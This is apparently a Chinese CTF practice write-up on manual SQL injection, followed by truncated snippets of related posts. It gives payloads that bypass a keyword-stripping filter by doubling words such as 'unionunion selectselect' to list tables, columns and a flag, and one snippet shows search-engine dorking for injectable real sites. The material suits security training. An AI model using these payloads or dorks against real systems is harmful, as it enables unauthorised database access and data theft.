1.手工!!!
發現union select 被過濾
之後通過輸入查表字段
,發現union select 被過濾了,這是想到用兩個union表示
重複輸入union select後發現空格也被過濾了,繼續用兩個空格代替乙個空格
1.查詢當前資料庫
1' unionunion selectselect database()'
2.查詢資料庫中的表
1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1
3.查詢欄位名
1' unionunion selectselect column_namcolumn_namee fromfrom information_schema.coluinformation_schema.columnsmns wherewhere table_name='flag
4.最後構造出1' unionunion selectselect flag fromfrom flag wherewhere '1'='1
SQL手工注入
site xx.cn inurl asp?id 找文章 xx.cn pth onews.asp?id 243 試注入 xx.cn pth onews.asp?id 243 order by 10 xx.cn pth onews.asp?id 243 order by 20 order by 語句用於...
墨者靶場 初級 SQL過濾字元後手工注入漏洞測試
安全工程師 墨者 最近在練習sql手工注入漏洞,自己剛搭建好乙個靶場環境apache php mysql,php 對客戶端提交的引數做了些許過濾。來感受過濾過後的sql手工注入吧。1 掌握sql注入原理 2 了解手工注入的方法 3 了解字串的url加解密 4 了解sql注入常用注釋字元 5 了解sq...
sql手工注入原理
純粹一些個人練習心得,所以今天就寫一篇部落格記錄一下 數值型 1.url輸入 and 1 1 and 1 2 回顯頁面不同 整形判斷 如果頁面執行錯誤,則說明此 sql 注入為數字型注入。因為當我們輸入 and 1 1時,後台執行 sql 語句 如 select from 表名 where id x...